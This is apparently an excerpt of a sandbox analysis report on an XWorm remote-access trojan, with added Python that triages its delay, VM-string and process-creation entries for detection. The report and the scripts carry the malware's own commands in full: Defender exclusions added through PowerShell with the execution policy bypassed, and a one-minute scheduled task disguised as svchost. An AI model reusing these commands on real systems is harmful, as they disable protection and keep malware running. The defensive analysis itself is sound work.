                          Source: C:\Users\user\AppData\Roaming\not rat.exe - Thread delayed: delay time: 922337203685477
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe - Thread delayed: delay time: 922337203685477
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe - Thread delayed: delay time: 600000
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe - Thread delayed: delay time: 599875
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe - Thread delayed: delay time: 599766
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe - Thread delayed: delay time: 599628
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe - Thread delayed: delay time: 599500
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe - Thread delayed: delay time: 599391
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe - Thread delayed: delay time: 599281
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe - Thread delayed: delay time: 599162
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe - Thread delayed: delay time: 599047
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe - Thread delayed: delay time: 598937
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe - Thread delayed: delay time: 598828
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe - Thread delayed: delay time: 598719
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe - Thread delayed: delay time: 598610
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe - Thread delayed: delay time: 598500
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe - Thread delayed: delay time: 598390
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe - Thread delayed: delay time: 598278
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe - Thread delayed: delay time: 598150
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe - Thread delayed: delay time: 598036
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe - Thread delayed: delay time: 597802
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe - Thread delayed: delay time: 597532
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe - Thread delayed: delay time: 597404
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe - Thread delayed: delay time: 597294
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe - Thread delayed: delay time: 597187
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe - Thread delayed: delay time: 597078
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe - Thread delayed: delay time: 596969
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe - Thread delayed: delay time: 596860
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe - Thread delayed: delay time: 596735
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe - Thread delayed: delay time: 596610
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe - Thread delayed: delay time: 596485
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe - Thread delayed: delay time: 596360
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe - Thread delayed: delay time: 596235
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe - Thread delayed: delay time: 596110
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe - Thread delayed: delay time: 595985
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe - Thread delayed: delay time: 595863
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe - Thread delayed: delay time: 595735
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe - Thread delayed: delay time: 595610
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe - Thread delayed: delay time: 595485
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe - Thread delayed: delay time: 595360
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe - Thread delayed: delay time: 595235
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe - Thread delayed: delay time: 594880
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe - Thread delayed: delay time: 594750
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe - Thread delayed: delay time: 594641
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe - Thread delayed: delay time: 594516
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe - Thread delayed: delay time: 594406
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe - Thread delayed: delay time: 594297
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe - Thread delayed: delay time: 594188
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe - Thread delayed: delay time: 594063
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe - Thread delayed: delay time: 593938
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe - Thread delayed: delay time: 593813
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe - Thread delayed: delay time: 593703
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe - Thread delayed: delay time: 593594
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe - Thread delayed: delay time: 593469
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe - Thread delayed: delay time: 593359
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - Thread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - Thread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 922337203685477
                          Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 922337203685477
                          Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 922337203685477
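
The delay values above carry two different stories once converted. The repeated 922337203685477 ms from powershell.exe and svchost.exe is what a relative NtDelayExecution interval of 0x8000000000000000 (Windows' encoding of an INFINITE wait) comes to in milliseconds, so it marks threads blocked without a timeout rather than a chosen sleep length. The Bootstrapper's values, by contrast, shrink by roughly 125 ms per entry from 596610 ms downward, which is consistent with a loop that keeps re-arming a sleep for the time still left until a fixed deadline of about ten minutes, well past the length of a typical automated run. The following Python is an added example, not part of the Joe Sandbox report: it parses "Thread delayed" lines in either the fused or the separated layout, recognises the infinite-wait constant, and flags descending series as countdowns. The sample lines are constructed from the entries above; the thresholds and the countdown heuristic are the example's own choices, and the unit conversion the sandbox applies is an assumption.

```python
import re
from statistics import mean

# |0x8000000000000000| 100-ns units / 10000 = 922337203685477 ms. A relative
# NtDelayExecution interval of Int64.MinValue is Windows' encoding of an
# INFINITE wait; printed in milliseconds by the sandbox it becomes this
# constant. (The sandbox's unit conversion is an assumption; the arithmetic
# itself is exact.)
INFINITE_MS = (1 << 63) // 10_000

# Anything a minute or longer is worth a look: automated runs are short.
LONG_MS = 60_000

# Matches both the fused report line ("...exeThread delayed: ...") and a
# "Source: <path> | Thread delayed: ..." layout.
DELAY_RE = re.compile(
    r"Source:\s*(?P<proc>.+?)\s*\|?\s*Thread delayed: delay time:\s*(?P<ms>\d+)"
)

# Constructed sample, transcribed from a subset of the entries above.
_BOOT = r"C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe"
_PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
_SVC = r"C:\Users\user\AppData\Roaming\svchost.exe"
SAMPLE_LINES = (
    [f"Source: {_BOOT} | Thread delayed: delay time: {ms}"
     for ms in (596610, 596485, 596360, 596235, 596110, 595985, 595863, 595735)]
    + [f"Source: {_PS}Thread delayed: delay time: 922337203685477Jump to behavior"] * 4
    + [f"Source: {_SVC} | Thread delayed: delay time: 922337203685477"] * 3
)


def parse_delays(lines):
    """(process basename, delay in ms) for every 'Thread delayed' line."""
    out = []
    for line in lines:
        m = DELAY_RE.search(line)
        if m:
            out.append((m.group("proc").rsplit("\\", 1)[-1], int(m.group("ms"))))
    return out


def classify(ms):
    if ms >= INFINITE_MS:
        return "infinite"
    return "long" if ms >= LONG_MS else "short"


def summarize_delays(entries):
    """Per process: how many infinite waits, and whether the finite
    requests form a countdown (each one a little shorter than the last)."""
    per = {}
    for proc, ms in entries:
        d = per.setdefault(proc, {"infinite": 0, "finite": []})
        if classify(ms) == "infinite":
            d["infinite"] += 1
        else:
            d["finite"].append(ms)
    report = {}
    for proc, d in per.items():
        f = d["finite"]
        r = {"infinite": d["infinite"], "finite": len(f)}
        if f:
            r["max_ms"], r["min_ms"] = max(f), min(f)
            steps = [a - b for a, b in zip(f, f[1:])]
            # Strictly decreasing requests a few hundred ms apart look like a
            # loop re-arming "deadline - now" every time a sleep returns.
            r["countdown"] = len(f) >= 3 and all(s > 0 for s in steps)
            if r["countdown"]:
                r["mean_step_ms"] = round(mean(steps))
                r["deadline_s"] = round(max(f) / 1000)
        report[proc] = r
    return report


if __name__ == "__main__":
    for proc, r in summarize_delays(parse_delays(SAMPLE_LINES)).items():
        print(proc, r)
```

Run against the full list above, the Bootstrapper entry comes out as a countdown with a deadline near 597 s, which is the number to compare against the sandbox's configured run time; the infinite waits from powershell.exe and svchost.exe are not in themselves evidence of timing evasion.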
Source: Amcache.hve.12.dr | Binary or memory string: VMware
Source: Amcache.hve.12.dr | Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.12.dr | Binary or memory string: vmci.syshbin
Source: Amcache.hve.12.dr | Binary or memory string: VMware-42 27 c5 9a 47 85 d6 84-53 49 ec ec 87 a6 6d 67
Source: Amcache.hve.12.dr | Binary or memory string: VMware, Inc.
Source: Amcache.hve.12.dr | Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.12.dr | Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.12.dr | Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.12.dr | Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: svchost.exe, 0000000E.00000002.2614689488.0000029106CD3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2613777027.0000029106C2B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: Amcache.hve.12.dr | Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.12.dr | Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.12.dr | Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.12.dr | Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: not rat.exe, 00000002.00000002.2630548369.000000001BE60000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: svchost.exe, 0000000E.00000002.2614257252.0000029106C8C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: W#/VMWare
Source: Amcache.hve.12.dr | Binary or memory string: vmci.sys
Source: Amcache.hve.12.dr | Binary or memory string: vmci.syshbin`
Source: svchost.exe.2.dr | Binary or memory string: vmware
Source: Amcache.hve.12.dr | Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.12.dr | Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.12.dr | Binary or memory string: VMware20,1
Source: Amcache.hve.12.dr | Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.12.dr | Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.12.dr | Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.12.dr | Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.12.dr | Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.12.dr | Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.12.dr | Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.12.dr | Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.12.dr | Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.12.dr | Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: BootstrapperV1.23_ModdedByHisako.exe, 00000003.00000002.1685399090.0000022EC9FAF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll>
Source: Amcache.hve.12.dr | Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: C:\Users\user\AppData\Roaming\not rat.exe | Process information queried: ProcessInformation
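
Most of the hypervisor strings above do not originate in the sample. Amcache.hve.12.dr is a dropped copy of the analysis VM's own Amcache hive, which inventories that machine's devices, drivers and BIOS, and "Hyper-V RAW" is the Winsock catalog name of the AF_HYPERV provider in mswsock.dll, present in the memory of any process that has initialised Winsock. The hits that actually say something about the sample are the lowercase "vmware" inside the dropped svchost.exe (svchost.exe.2.dr) and the strings read from its process memory. As an added example, not part of the Joe Sandbox report, the Python below parses each "Binary or memory string" entry, decodes the source tag (memory dump, dropped file or process), and attributes the hit to the environment or to the sample. The sample lines are constructed from entries above; the attribution rules are the example's own.

```python
import re

# Both the fused report layout ("...12.drBinary or memory string: ...") and
# "Source: <tag> | Binary or memory string: ..." are accepted.
HIT_RE = re.compile(
    r"Source:\s*(?P<src>.+?)\s*\|?\s*Binary or memory string:\s*(?P<text>.*?)\s*$"
)

# Strings any Windows process carries on a virtualised host, whatever the
# sample does. "Hyper-V RAW" is the Winsock catalog name of the AF_HYPERV
# provider (mswsock.dll).
ENVIRONMENT_STRINGS = ("hyper-v raw",)

# Constructed sample, transcribed from entries above (one in the fused layout).
SAMPLE_HITS = [
    r"Source: Amcache.hve.12.dr | Binary or memory string: VMware",
    r"Source: Amcache.hve.12.dr | Binary or memory string: VMware Virtual USB Mouse",
    r"Source: Amcache.hve.12.dr | Binary or memory string: vmci.sys",
    r"Source: Amcache.hve.12.dr | Binary or memory string: Microsoft Hyper-V Generation Counter",
    r"Source: Amcache.hve.12.dr | Binary or memory string: VMware, Inc.",
    r"Source: svchost.exe, 0000000E.00000002.2614689488.0000029106CD3000.00000004.00000020.00020000.00000000.sdmp, "
    r"svchost.exe, 0000000E.00000002.2613777027.0000029106C2B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW",
    r"Source: not rat.exe, 00000002.00000002.2630548369.000000001BE60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll",
    r"Source: svchost.exe, 0000000E.00000002.2614257252.0000029106C8C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: W#/VMWare",
    r"Source: svchost.exe.2.dr | Binary or memory string: vmware",
]


def parse_source(src):
    """Split a Joe Sandbox source tag into (kind, file name).

    '<name>, <dump id>.sdmp' is a process memory dump, '<name>.<n>.dr' a file
    dropped by process <n>, anything else a process path.
    """
    src = src.strip()
    if src.endswith(".sdmp"):
        return "process memory", src.split(",", 1)[0].strip()
    m = re.match(r"(?P<name>.+)\.(?P<n>\d+)\.dr$", src)
    if m:
        name = m.group("name")
        return ("dropped hive" if name.lower().endswith(".hve") else "dropped file"), name
    return "process", src


def attribute(kind, text):
    """Where the string evidence actually comes from."""
    if kind == "dropped hive":
        # A copy of the VM's own Amcache: it describes the analysis machine's
        # hardware, not anything the sample contains.
        return "environment"
    if any(s in text.lower() for s in ENVIRONMENT_STRINGS):
        return "environment"
    return "sample (on disk)" if kind == "dropped file" else "sample (memory)"


def triage(lines):
    rows = []
    for line in lines:
        m = HIT_RE.search(line)
        if not m:
            continue
        kind, name = parse_source(m.group("src"))
        rows.append({"source": name, "kind": kind, "string": m.group("text"),
                     "origin": attribute(kind, m.group("text"))})
    return rows


def summarize_hits(rows):
    """Count per origin and list the hits worth carrying into a write-up:
    hypervisor strings that sit in the sample's own dropped files."""
    counts = {}
    for r in rows:
        counts[r["origin"]] = counts.get(r["origin"], 0) + 1
    on_disk = [(r["source"], r["string"]) for r in rows if r["origin"] == "sample (on disk)"]
    return counts, on_disk


if __name__ == "__main__":
    counts, on_disk = summarize_hits(triage(SAMPLE_HITS))
    print(counts, on_disk)
```

Applied to the whole list above, the environment bucket absorbs every Amcache and Hyper-V RAW line and leaves a handful of sample-attributable hits, which is the set to check against the sample's own code (for example a manufacturer string comparison) before calling the behaviour VM detection.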

                          Anti Debugging

Source: C:\Users\user\AppData\Roaming\not rat.exe | Code function: 2_2_00007FFB4B0F7200 CheckRemoteDebuggerPresent,2_2_00007FFB4B0F7200
Source: C:\Users\user\AppData\Roaming\not rat.exe | Process queried: DebugPort
Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe | Process queried: DebugPort
Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe | Process queried: DebugPort
Source: C:\Users\user\AppData\Roaming\not rat.exe | Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\not rat.exe | Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe | Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\svchost.exe | Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\svchost.exe | Process token adjusted: Debug
Source: C:\Users\user\Desktop\sDKRz09zM7.exe | Memory allocated: page read and write | page guard

                          HIPS / PFW / Operating System Protection Evasion

Source: Yara match | File source: Process Memory Space: BootstrapperV1.23_ModdedByHisako.exe PID: 7424, type: MEMORYSTR
Source: Yara match | File source: \Device\ConDrv, type: DROPPED
Source: C:\Users\user\AppData\Roaming\not rat.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\not rat.exe'
Source: C:\Users\user\AppData\Roaming\not rat.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe'
Source: C:\Users\user\Desktop\sDKRz09zM7.exe | Process created: C:\Users\user\AppData\Roaming\not rat.exe "C:\Users\user\AppData\Roaming\not rat.exe"
Source: C:\Users\user\Desktop\sDKRz09zM7.exe | Process created: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe "C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe"
Source: C:\Users\user\AppData\Roaming\not rat.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'not rat.exe'
Source: C:\Users\user\AppData\Roaming\not rat.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
Source: C:\Users\user\AppData\Roaming\not rat.exe | Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user\AppData\Roaming\svchost.exe"
Source: C:\Windows\System32\svchost.exe | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 444 -p 7424 -ip 7424
Source: C:\Windows\System32\svchost.exe | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7424 -s 2180
Source: not rat.exe, 00000002.00000002.2621953796.0000000003112000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: 'PING!<Xwormmm>Program Manager<Xwormmm>0
Source: not rat.exe, 00000002.00000002.2621953796.0000000003112000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Program Manager
Source: not rat.exe, 00000002.00000002.2621953796.0000000003112000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Program Manager2}
Source: not rat.exe, 00000002.00000002.2621953796.0000000003112000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: PING!<Xwormmm>Program Manager<Xwormmm>0
Source: not rat.exe, 00000002.00000002.2621953796.0000000003112000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: 'PING!<Xwormmm>Program Manager<Xwormmm>0@
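
The process-creation lines above carry the whole evasion-and-persistence chain in clear text: "not rat.exe" launches powershell.exe with -ExecutionPolicy Bypass to add Defender exclusions for both dropped files, by path and also by bare process name (an -ExclusionProcess of 'svchost.exe' excludes every process with that name, the dropped copy included), then runs schtasks.exe to create a task named "svchost" that starts the Roaming copy every minute with the highest run level. The two WerFault.exe lines show PID 7424, the Bootstrapper process per the Yara match line, crashing during the run. The memory strings that follow are the XWorm keep-alive, with <Xwormmm> as field delimiter and "Program Manager" (the desktop's own window title, so no foreground application) as the field after the command. The Python below is an added example, not part of the Joe Sandbox report and not any Sigma rule's logic: it runs these checks over process-creation events constructed from the lines above and splits the beacon into its fields. The rule names, the system-process name list and the heuristics are the example's own.

```python
import ntpath
import re

# Names that belong only in the Windows system directories (example's own list).
SYSTEM_NAMES = {"svchost.exe", "csrss.exe", "lsass.exe", "winlogon.exe", "explorer.exe"}
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
XWORM_SPLIT = "<Xwormmm>"   # field delimiter seen in the memory strings above

# Constructed sample: the "Process created" lines above as parent/image/command
# line triples (the leading quoted image path is dropped from the command line).
SAMPLE_EVENTS = [
    {"parent": r"C:\Users\user\Desktop\sDKRz09zM7.exe",
     "image": r"C:\Users\user\AppData\Roaming\not rat.exe",
     "cmdline": r'"C:\Users\user\AppData\Roaming\not rat.exe"'},
    {"parent": r"C:\Users\user\AppData\Roaming\not rat.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -ExecutionPolicy Bypass Add-MpPreference "
                r"-ExclusionPath 'C:\Users\user\AppData\Roaming\not rat.exe'"},
    {"parent": r"C:\Users\user\AppData\Roaming\not rat.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -ExecutionPolicy Bypass Add-MpPreference "
                r"-ExclusionProcess 'svchost.exe'"},
    {"parent": r"C:\Users\user\AppData\Roaming\not rat.exe",
     "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r'schtasks.exe /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" '
                r'/tr "C:\Users\user\AppData\Roaming\svchost.exe"'},
    {"parent": r"C:\Windows\System32\svchost.exe",
     "image": r"C:\Windows\System32\WerFault.exe",
     "cmdline": r"WerFault.exe -u -p 7424 -s 2180"},
]


def masquerades(path):
    """A system-process file name outside System32/SysWOW64 (a bare name counts)."""
    p = path.strip('"').lower()
    return ntpath.basename(p) in SYSTEM_NAMES and not p.startswith(SYSTEM_DIRS)


def _arg(cmd, flag):
    """Value following `flag`, quoted with " or ' or bare; None if absent."""
    m = re.search(re.escape(flag) + r'\s+(?:"([^"]+)"|\'([^\']+)\'|(\S+))', cmd, re.I)
    return (m.group(1) or m.group(2) or m.group(3)) if m else None


def analyze_event(ev):
    """(rule, detail) findings for one process-creation event."""
    image = ntpath.basename(ev["image"]).lower()
    cmd, low = ev["cmdline"], ev["cmdline"].lower()
    hits = []
    for role in ("parent", "image"):
        if masquerades(ev[role]):
            hits.append(("system_name_masquerade", f"{role}={ev[role]}"))
    if image in ("powershell.exe", "pwsh.exe"):
        if re.search(r"-(?:executionpolicy|ep|ex)\s+bypass", low):
            hits.append(("ps_execpolicy_bypass", cmd))
        param = re.search(r"-(exclusion(?:path|process|extension|ipaddress))\b", cmd, re.I)
        if "add-mppreference" in low and param:
            value = _arg(cmd, "-" + param.group(1)) or "?"
            note = ""
            if param.group(1).lower() == "exclusionprocess" and "\\" not in value:
                note = " (bare name: excludes every process with this name)"
            elif masquerades(value):
                note = " (system-process name outside System32)"
            hits.append(("defender_exclusion", f"{param.group(1)}={value}{note}"))
    if image == "schtasks.exe" and "/create" in low:
        target, name = _arg(cmd, "/tr") or "", _arg(cmd, "/tn") or ""
        flags = []
        if re.search(r"/sc\s+minute\s+/mo\s+1\b", low):
            flags.append("every minute")
        if "/rl highest" in low:
            flags.append("RunLevel=HIGHEST")
        if "\\appdata\\" in target.lower():
            flags.append("target under AppData")
        if masquerades(target):
            flags.append("system-name masquerade")
        hits.append(("schtasks_persistence", f"{name} -> {target} [{', '.join(flags)}]"))
    return hits


def analyze_events(events):
    return [hit for ev in events for hit in analyze_event(ev)]


def parse_xworm_message(msg):
    """Split an XWorm message on its delimiter. For the PING! keep-alive the
    field after the command is the foreground window title; "Program Manager"
    is the bare desktop, i.e. nobody was interacting with the VM."""
    fields = msg.split(XWORM_SPLIT)
    return {"command": fields[0], "fields": fields[1:]}


if __name__ == "__main__":
    for rule, detail in analyze_events(SAMPLE_EVENTS):
        print(f"{rule:24} {detail}")
    print(parse_xworm_message("PING!<Xwormmm>Program Manager<Xwormmm>0"))
```

The WerFault event and the initial drop of "not rat.exe" produce no findings, which is the point of carrying them: the rules key on the exclusion cmdlet, the policy bypass, the one-minute task with a user-writable target, and a system name outside the system directories, not on the mere presence of powershell.exe or schtasks.exe.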
Source: C:\Users\user\Desktop\sDKRz09zM7.exe | Queries volume information: C:\Users\user\Desktop\sDKRz09zM7.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\not rat.exe | Queries volume information: C:\Users\user\AppData\Roaming\not rat.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\not rat.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe | Queries volume information: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
